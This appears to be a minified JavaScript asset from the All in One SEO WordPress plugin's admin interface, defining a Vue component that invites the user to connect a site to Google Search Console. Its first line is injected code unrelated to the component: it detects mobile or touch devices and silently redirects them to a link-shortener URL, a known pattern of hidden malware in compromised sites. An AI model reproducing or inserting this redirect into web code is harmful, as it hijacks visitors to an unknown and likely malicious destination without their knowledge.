(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{p as l}from"./app-core.c8323d51.js";import{u as p}from"./GoogleSearchConsole.2c609745.js";import{C as f}from"./Index.e286637f.js";import{_ as o}from"./vendor-other.39e59221.js";import{f as d,Q as _,R as a,ae as r,U as s,v as n}from"./vendor-vue-ui.232c7c36.js";const k={__name:"ConnectCta",setup(m){const t="all-in-one-seo-pack",c=l(),{connect:i,loading:u}=p(),e={ctaHeaderText:o("Connect your website to Google Search Console",t),ctaDescription:o("Connect your site to Google Search Console to receive insights on how content is being discovered. Identify areas for improvement and drive traffic to your website.",t),ctaButtonText:o("Connect to Google Search Console",t),ctaSecondButtonText:o("Explore Sample Reports",t),feature1:o("Search traffic insights",t),feature2:o("Improved visibility",t),feature3:o("Track page and keyword rankings",t),feature4:o("Speed tests for individual pages/posts",t)};return(g,C)=>(d(),_(n(f),{"cta-button-action":"","cta-second-button-action":"",onCtaButtonClick:n(i),onCtaSecondButtonClick:n(c).showSampleReports,"cta-button-loading":n(u),"show-link":!1,"button-text":e.ctaButtonText,"second-button-text":e.ctaSecondButtonText,"cta-second-button-new-badge":"","cta-second-button-visible":"",alignTop:!0,hideBonus:!0,"feature-list":[e.feature1,e.feature2,e.feature3,e.feature4]},{"header-text":a(()=>[r(s(e.ctaHeaderText),1)]),description:a(()=>[r(s(e.ctaDescription),1)]),_:1},8,["onCtaButtonClick","onCtaSecondButtonClick","cta-button-loading","button-text","second-button-text","feature-list"]))}};export{k as _};
